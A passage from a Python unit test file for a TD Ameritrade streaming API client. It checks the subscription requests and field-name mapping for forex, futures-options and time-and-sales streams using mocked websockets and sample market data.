1590598761603, 'HIGH_PRICE': 34.32, 'LOW_PRICE': 32.18, 'CLOSE_PRICE': 34.35, 'EXCHANGE_ID': 'E', 'DESCRIPTION': 'Light Sweet Crude Oil Futures,Jul-2020,ETH', 'LAST_ID': '?', 'OPEN_PRICE': 34.14, 'NET_CHANGE': -1.01, 'FUTURE_PERCENT_CHANGE': -0.0294, 'EXCHANGE_NAME': 'XNYM', 'SECURITY_STATUS': 'Unknown', 'OPEN_INTEREST': 270931, 'MARK': 33.35, 'TICK': 0.01, 'TICK_AMOUNT': 10, 'PRODUCT': '/CL', 'FUTURE_PRICE_FORMAT': 'D,D', 'FUTURE_TRADING_HOURS': ( 'GLBX(de=1640;0=-17001600;' + '1=-17001600d-15551640;7=d-16401555)'), 'FUTURE_IS_TRADEABLE': True, 'FUTURE_MULTIPLIER': 1000, 'FUTURE_IS_ACTIVE': True, 'FUTURE_SETTLEMENT_PRICE': 34.35, 'FUTURE_ACTIVE_SYMBOL': '/CLN20', 'FUTURE_EXPIRATION_DATE': 1592798400000 }] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # LEVELONE_FOREX @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_forex_subs_success_all_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'LEVELONE_FOREX', 'SUBS'))] await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'LEVELONE_FOREX', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'EUR/USD,EUR/GBP', 'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,' + '20,21,22,23,24,25,26,27,28,29') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_forex_subs_success_some_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'LEVELONE_FOREX', 'SUBS'))] await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'], fields=[ StreamClient.LevelOneForexFields.SYMBOL, StreamClient.LevelOneForexFields.HIGH_PRICE, StreamClient.LevelOneForexFields.LOW_PRICE, StreamClient.LevelOneForexFields.MARKET_MAKER, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'LEVELONE_FOREX', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'EUR/USD,EUR/GBP', 'fields': '0,10,11,26' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_forex_subs_success_some_fields_no_symbol( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'LEVELONE_FOREX', 'SUBS'))] await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP'], fields=[ StreamClient.LevelOneForexFields.HIGH_PRICE, StreamClient.LevelOneForexFields.LOW_PRICE, StreamClient.LevelOneForexFields.MARKET_MAKER, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'LEVELONE_FOREX', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'EUR/USD,EUR/GBP', 'fields': '0,10,11,26' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_forex_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'LEVELONE_FOREX', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP']) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_forex_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [{ 'service': 'LEVELONE_FOREX', 'timestamp': 1590599267920, 'command': 'SUBS', 'content': [{ 'key': 'EUR/GBP', 'delayed': False, 'assetMainType': 'FOREX', '1': 0.8967, '2': 0.8969, '3': 0.8968, '4': 1000000, '5': 1000000, '6': 19000000, '7': 370000, '8': 1590599267658, '9': 1590599267658, '10': 0.8994, '11': 0.8896, '12': 0.894, '13': 'T', '14': 'Euro/GBPound Spot', '15': 0.8901, '16': 0.0028, '18': 'GFT', '19': 2, '20': 'Unknown', '21': 'UNUSED', '22': 'UNUSED', '23': 'UNUSED', '24': 'UNUSED', '25': 'UNUSED', '26': 'UNUSED', '27': 0.8994, '28': 0.8896, '29': 0.8968 }, { 'key': 'EUR/USD', 'delayed': False, 'assetMainType': 'FOREX', '1': 1.0976, '2': 1.0978, '3': 1.0977, '4': 1000000, '5': 2800000, '6': 633170000, '7': 10000, '8': 1590599267658, '9': 1590599267658, '10': 1.1031, '11': 1.0936, '12': 1.0893, '13': 'T', '14': 'Euro/USDollar Spot', '15': 1.0982, '16': 0.0084, '18': 'GFT', '19': 2, '20': 'Unknown', '21': 'UNUSED', '22': 'UNUSED', '23': 'UNUSED', '24': 'UNUSED', '25': 'UNUSED', '26': 'UNUSED', '27': 1.1031, '28': 1.0936, '29': 1.0977 }] }] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'LEVELONE_FOREX', 'SUBS')), json.dumps(stream_item)] await self.client.level_one_forex_subs(['EUR/USD', 'EUR/GBP']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_level_one_forex_handler(handler) self.client.add_level_one_forex_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'LEVELONE_FOREX', 'timestamp': 1590599267920, 'command': 'SUBS', 'content': [{ 'key': 'EUR/GBP', 'delayed': False, 'assetMainType': 'FOREX', 'BID_PRICE': 0.8967, 'ASK_PRICE': 0.8969, 'LAST_PRICE': 0.8968, 'BID_SIZE': 1000000, 'ASK_SIZE': 1000000, 'TOTAL_VOLUME': 19000000, 'LAST_SIZE': 370000, 'QUOTE_TIME': 1590599267658, 'TRADE_TIME': 1590599267658, 'HIGH_PRICE': 0.8994, 'LOW_PRICE': 0.8896, 'CLOSE_PRICE': 0.894, 'EXCHANGE_ID': 'T', 'DESCRIPTION': 'Euro/GBPound Spot', 'OPEN_PRICE': 0.8901, 'NET_CHANGE': 0.0028, 'EXCHANGE_NAME': 'GFT', 'DIGITS': 2, 'SECURITY_STATUS': 'Unknown', 'TICK': 'UNUSED', 'TICK_AMOUNT': 'UNUSED', 'PRODUCT': 'UNUSED', 'TRADING_HOURS': 'UNUSED', 'IS_TRADABLE': 'UNUSED', 'MARKET_MAKER': 'UNUSED', 'HIGH_52_WEEK': 0.8994, 'LOW_52_WEEK': 0.8896, 'MARK': 0.8968 }, { 'key': 'EUR/USD', 'delayed': False, 'assetMainType': 'FOREX', 'BID_PRICE': 1.0976, 'ASK_PRICE': 1.0978, 'LAST_PRICE': 1.0977, 'BID_SIZE': 1000000, 'ASK_SIZE': 2800000, 'TOTAL_VOLUME': 633170000, 'LAST_SIZE': 10000, 'QUOTE_TIME': 1590599267658, 'TRADE_TIME': 1590599267658, 'HIGH_PRICE': 1.1031, 'LOW_PRICE': 1.0936, 'CLOSE_PRICE': 1.0893, 'EXCHANGE_ID': 'T', 'DESCRIPTION': 'Euro/USDollar Spot', 'OPEN_PRICE': 1.0982, 'NET_CHANGE': 0.0084, 'EXCHANGE_NAME': 'GFT', 'DIGITS': 2, 'SECURITY_STATUS': 'Unknown', 'TICK': 'UNUSED', 'TICK_AMOUNT': 'UNUSED', 'PRODUCT': 'UNUSED', 'TRADING_HOURS': 'UNUSED', 'IS_TRADABLE': 'UNUSED', 'MARKET_MAKER': 'UNUSED', 'HIGH_52_WEEK': 1.1031, 'LOW_52_WEEK': 1.0936, 'MARK': 1.0977 }] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # LEVELONE_FUTURES_OPTIONS @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_futures_options_subs_success_all_fields( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS'))] await self.client.level_one_futures_options_subs( ['NQU20_C6500', 'NQU20_P6500']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'LEVELONE_FUTURES_OPTIONS', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'NQU20_C6500,NQU20_P6500', 'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,' + '19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_futures_options_subs_success_some_fields( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS'))] await self.client.level_one_futures_options_subs( ['NQU20_C6500', 'NQU20_P6500'], fields=[ StreamClient.LevelOneFuturesOptionsFields.SYMBOL, StreamClient.LevelOneFuturesOptionsFields.BID_SIZE, StreamClient.LevelOneFuturesOptionsFields.ASK_SIZE, StreamClient.LevelOneFuturesOptionsFields.FUTURE_PRICE_FORMAT, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'LEVELONE_FUTURES_OPTIONS', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'NQU20_C6500,NQU20_P6500', 'fields': '0,4,5,28' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_futures_options_subs_success_some_fields_no_symol( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS'))] await self.client.level_one_futures_options_subs( ['NQU20_C6500', 'NQU20_P6500'], fields=[ StreamClient.LevelOneFuturesOptionsFields.BID_SIZE, StreamClient.LevelOneFuturesOptionsFields.ASK_SIZE, StreamClient.LevelOneFuturesOptionsFields.FUTURE_PRICE_FORMAT, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'LEVELONE_FUTURES_OPTIONS', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'NQU20_C6500,NQU20_P6500', 'fields': '0,4,5,28' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_futures_options_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.level_one_futures_options_subs( ['NQU20_C6500', 'NQU20_P6500']) @no_duplicates # TODO: Replace this with real messages @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_futures_options_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [{ 'service': 'LEVELONE_FUTURES_OPTIONS', 'timestamp': 1590245129396, 'command': 'SUBS', 'content': [{ 'key': 'NQU20_C6500', 'delayed': False, 'assetMainType': 'FUTURES_OPTION', '1': 2956, '2': 2956.5, '3': 2956.4, '4': 3, '5': 2, '6': 'E', '7': 'T', '8': 1293, '9': 6, '10': 1590181200064, '11': 1590181199726, '12': 2956.6, '13': 2956.3, '14': 2956.25, '15': '?', '16': 'NASDAQ Call', '17': '?', '18': 2956.0, '19': 0.1, '20': 1.2, '21': 'EXCH', '22': 'Unknown', '23': 19, '24': 2955.9, '25': 0.1, '26': 100, '27': 'NQU', '28': '0.01', '29': ('GLBX(de=1640;0=-1700151515301596;' + '1=r-17001515r15301600d-15551640;' + '7=d-16401555)'), '30': True, '31': 100, '32': True, '33': 17.9, '33': 'NQU', '34': '2020-03-01' }, { 'key': 'NQU20_C6500', 'delayed': False, 'assetMainType': 'FUTURES_OPTION', '1': 2957, '2': 2958.5, '3': 2957.4, '4': 4, '5': 3, '6': 'Q', '7': 'V', '8': 1294, '9': 7, '10': 1590181200065, '11': 1590181199727, '12': 2956.7, '13': 2956.4, '14': 2956.26, '15': '?', '16': 'NASDAQ Put', '17': '?', '18': 2956.1, '19': 0.2, '20': 1.3, '21': 'EXCH', '22': 'Unknown', '23': 20, '24': 2956.9, '25': 0.2, '26': 101, '27': 'NQU', '28': '0.02', '29': ('GLBX(de=1641;0=-1700151515301596;' + '1=r-17001515r15301600d-15551640;' + '7=d-16401555)'), '30': True, '31': 101, '32': True, '33': 17.10, '33': 'NQU', '34': '2021-03-01' }] }] } socket.recv.side_effect = [ json.dumps(self.success_response( 1, 'LEVELONE_FUTURES_OPTIONS', 'SUBS')), json.dumps(stream_item)] await self.client.level_one_futures_options_subs( ['NQU20_C6500', 'NQU20_P6500']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_level_one_futures_options_handler(handler) self.client.add_level_one_futures_options_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'LEVELONE_FUTURES_OPTIONS', 'timestamp': 1590245129396, 'command': 'SUBS', 'content': [{ 'key': 'NQU20_C6500', 'delayed': False, 'assetMainType': 'FUTURES_OPTION', 'BID_PRICE': 2956, 'ASK_PRICE': 2956.5, 'LAST_PRICE': 2956.4, 'BID_SIZE': 3, 'ASK_SIZE': 2, 'ASK_ID': 'E', 'BID_ID': 'T', 'TOTAL_VOLUME': 1293, 'LAST_SIZE': 6, 'QUOTE_TIME': 1590181200064, 'TRADE_TIME': 1590181199726, 'HIGH_PRICE': 2956.6, 'LOW_PRICE': 2956.3, 'CLOSE_PRICE': 2956.25, 'EXCHANGE_ID': '?', 'DESCRIPTION': 'NASDAQ Call', 'LAST_ID': '?', 'OPEN_PRICE': 2956.0, 'NET_CHANGE': 0.1, 'FUTURE_PERCENT_CHANGE': 1.2, 'EXCHANGE_NAME': 'EXCH', 'SECURITY_STATUS': 'Unknown', 'OPEN_INTEREST': 19, 'MARK': 2955.9, 'TICK': 0.1, 'TICK_AMOUNT': 100, 'PRODUCT': 'NQU', 'FUTURE_PRICE_FORMAT': '0.01', 'FUTURE_TRADING_HOURS': ('GLBX(de=1640;0=-1700151515301596;' + '1=r-17001515r15301600d-15551640;' + '7=d-16401555)'), 'FUTURE_IS_TRADEABLE': True, 'FUTURE_MULTIPLIER': 100, 'FUTURE_IS_ACTIVE': True, 'FUTURE_SETTLEMENT_PRICE': 17.9, 'FUTURE_SETTLEMENT_PRICE': 'NQU', 'FUTURE_ACTIVE_SYMBOL': '2020-03-01' }, { 'key': 'NQU20_C6500', 'delayed': False, 'assetMainType': 'FUTURES_OPTION', 'BID_PRICE': 2957, 'ASK_PRICE': 2958.5, 'LAST_PRICE': 2957.4, 'BID_SIZE': 4, 'ASK_SIZE': 3, 'ASK_ID': 'Q', 'BID_ID': 'V', 'TOTAL_VOLUME': 1294, 'LAST_SIZE': 7, 'QUOTE_TIME': 1590181200065, 'TRADE_TIME': 1590181199727, 'HIGH_PRICE': 2956.7, 'LOW_PRICE': 2956.4, 'CLOSE_PRICE': 2956.26, 'EXCHANGE_ID': '?', 'DESCRIPTION': 'NASDAQ Put', 'LAST_ID': '?', 'OPEN_PRICE': 2956.1, 'NET_CHANGE': 0.2, 'FUTURE_PERCENT_CHANGE': 1.3, 'EXCHANGE_NAME': 'EXCH', 'SECURITY_STATUS': 'Unknown', 'OPEN_INTEREST': 20, 'MARK': 2956.9, 'TICK': 0.2, 'TICK_AMOUNT': 101, 'PRODUCT': 'NQU', 'FUTURE_PRICE_FORMAT': '0.02', 'FUTURE_TRADING_HOURS': ('GLBX(de=1641;0=-1700151515301596;' + '1=r-17001515r15301600d-15551640;' + '7=d-16401555)'), 'FUTURE_IS_TRADEABLE': True, 'FUTURE_MULTIPLIER': 101, 'FUTURE_IS_ACTIVE': True, 'FUTURE_SETTLEMENT_PRICE': 17.10, 'FUTURE_SETTLEMENT_PRICE': 'NQU', 'FUTURE_ACTIVE_SYMBOL': '2021-03-01' }] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # TIMESALE_EQUITY @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_equity_subs_success_all_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'TIMESALE_EQUITY', 'SUBS'))] await self.client.timesale_equity_subs(['GOOG', 'MSFT']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'TIMESALE_EQUITY', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG,MSFT', 'fields': ('0,1,2,3,4') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_equity_subs_success_some_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'TIMESALE_EQUITY', 'SUBS'))] await self.client.timesale_equity_subs(['GOOG', 'MSFT'], fields=[ StreamClient.TimesaleFields.SYMBOL, StreamClient.TimesaleFields.TRADE_TIME, StreamClient.TimesaleFields.LAST_SIZE, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'TIMESALE_EQUITY', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG,MSFT', 'fields': '0,1,3' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_equity_subs_success_some_fields_no_symbol( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'TIMESALE_EQUITY', 'SUBS'))] await self.client.timesale_equity_subs(['GOOG', 'MSFT'], fields=[ StreamClient.TimesaleFields.TRADE_TIME, StreamClient.TimesaleFields.LAST_SIZE, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'TIMESALE_EQUITY', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG,MSFT', 'fields': '0,1,3' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_equity_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'TIMESALE_EQUITY', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.timesale_equity_subs(['GOOG', 'MSFT']) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_equity_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [{ 'service': 'TIMESALE_EQUITY', 'timestamp': 1590599684016, 'command': 'SUBS', 'content': [{ 'seq': 43, 'key': 'MSFT', '1': 1590599683785, '2': 179.64, '3': 100.0, '4': 111626 }, { 'seq': 0, 'key': 'GOOG', '1': 1590599678467, '2': 1406.91, '3': 100.0, '4': 8620 }] }] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'TIMESALE_EQUITY', 'SUBS')), json.dumps(stream_item)] await self.client.timesale_equity_subs(['GOOG', 'MSFT']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_timesale_equity_handler(handler) self.client.add_timesale_equity_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'TIMESALE_EQUITY', 'timestamp': 1590599684016, 'command': 'SUBS', 'content': [{ 'seq': 43, 'key': 'MSFT', 'TRADE_TIME': 1590599683785, 'LAST_PRICE': 179.64, 'LAST_SIZE': 100.0, 'LAST_SEQUENCE': 111626 }, { 'seq': 0, 'key': 'GOOG', 'TRADE_TIME': 1590599678467, 'LAST_PRICE': 1406.91, 'LAST_SIZE': 100.0, 'LAST_SEQUENCE': 8620 }] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # TIMESALE_FUTURES @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_futures_subs_success_all_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'TIMESALE_FUTURES', 'SUBS'))] await self.client.timesale_futures_subs(['/ES', '/CL']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'TIMESALE_FUTURES', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': '/ES,/CL', 'fields': ('0,1,2,3,4') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_futures_subs_success_some_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'TIMESALE_FUTURES', 'SUBS'))] await self.client.timesale_futures_subs(['/ES', '/CL'], fields=[ StreamClient.TimesaleFields.SYMBOL, StreamClient.TimesaleFields.TRADE_TIME, StreamClient.TimesaleFields.LAST_SIZE, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'TIMESALE_FUTURES', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': '/ES,/CL', 'fields': '0,1,3' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_futures_subs_success_some_fields_no_symbol( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'TIMESALE_FUTURES', 'SUBS'))] await self.client.timesale_futures_subs(['/ES', '/CL'], fields=[ StreamClient.TimesaleFields.TRADE_TIME, StreamClient.TimesaleFields.LAST_SIZE, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'TIMESALE_FUTURES', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': '/ES,/CL', 'fields': '0,1,3' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_futures_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'TIMESALE_FUTURES', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.timesale_futures_subs(['/ES', '/CL']) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_futures_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [{ 'service': 'TIMESALE_FUTURES', 'timestamp': 1590600568685, 'command': 'SUBS', 'content': [{ 'seq': 0, 'key': '/ES', '1': 1590600568524, '2': 2998.0, '3': 1.0, '4': 9236856 }, { 'seq': 0, 'key': '/CL', '1': 1590600568328, '2': 33.08, '3': 1.0, '4': 68989244 }] }] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'TIMESALE_FUTURES', 'SUBS')), json.dumps(stream_item)] await self.client.timesale_futures_subs(['/ES', '/CL']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_timesale_futures_handler(handler) self.client.add_timesale_futures_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'TIMESALE_FUTURES', 'timestamp': 1590600568685, 'command': 'SUBS', 'content': [{ 'seq': 0, 'key': '/ES', 'TRADE_TIME': 1590600568524, 'LAST_PRICE': 2998.0, 'LAST_SIZE': 1.0, 'LAST_SEQUENCE': 9236856 }, { 'seq': 0, 'key': '/CL', 'TRADE_TIME': 1590600568328, 'LAST_PRICE': 33.08, 'LAST_SIZE': 1.0, 'LAST_SEQUENCE': 68989244 }] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # TIMESALE_OPTIONS @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_options_subs_success_all_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'TIMESALE_OPTIONS', 'SUBS'))] await self.client.timesale_options_subs(['/ES', '/CL']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'TIMESALE_OPTIONS', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': '/ES,/CL', 'fields': ('0,1,2,3,4') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_options_subs_success_some_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'TIMESALE_OPTIONS', 'SUBS'))] await self.client.timesale_options_subs( ['GOOG_052920C620', 'MSFT_052920C145'], fields=[ StreamClient.TimesaleFields.SYMBOL, StreamClient.TimesaleFields.TRADE_TIME, StreamClient.TimesaleFields.LAST_SIZE, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'TIMESALE_OPTIONS', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG_052920C620,MSFT_052920C145', 'fields': '0,1,3' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_options_subs_success_some_fields_no_symbol(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'TIMESALE_OPTIONS', 'SUBS'))] await self.client.timesale_options_subs( ['GOOG_052920C620', 'MSFT_052920C145'], fields=[ StreamClient.TimesaleFields.TRADE_TIME, StreamClient.TimesaleFields.LAST_SIZE, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'TIMESALE_OPTIONS', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG_052920C620,MSFT_052920C145', 'fields': '0,1,3' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_options_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'TIMESALE_OPTIONS', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.timesale_options_subs( ['GOOG_052920C620', 'MSFT_052920C145']) @no_duplicates # TODO: Replace this with real messages @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_timesale_options_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [{ 'service': 'TIMESALE_OPTIONS', 'timestamp': 1590245129396, 'command': 'SUBS', 'content': [{ 'key': 'GOOG_052920C620', 'delayed': False, '1': 1590181199726, '2': 1000, '3': 100, '4': 9990 }, { 'key': 'MSFT_052920C145', 'delayed': False, '1': 1590181199727, '2': 1100, '3': 110, '4': 9991 }] }] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'TIMESALE_OPTIONS', 'SUBS')), json.dumps(stream_item)] await self.client.timesale_options_subs( ['GOOG_052920C620', 'MSFT_052920C145']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_timesale_options_handler(handler) self.client.add_timesale_options_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'TIMESALE_OPTIONS', 'timestamp': 1590245129396, 'command': 'SUBS', 'content': [{ 'key': 'GOOG_052920C620', 'delayed': False, 'TRADE_TIME': 1590181199726, 'LAST_PRICE': 1000, 'LAST_SIZE': 100, 'LAST_SEQUENCE': 9990 }, { 'key': 'MSFT_052920C145', 'delayed': False, 'TRADE_TIME': 1590181199727, 'LAST_PRICE': 1100, 'LAST_SIZE': 110, 'LAST_SEQUENCE': 9991 }] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # LISTED_BOOK @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_listed_book_subs_success_all_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 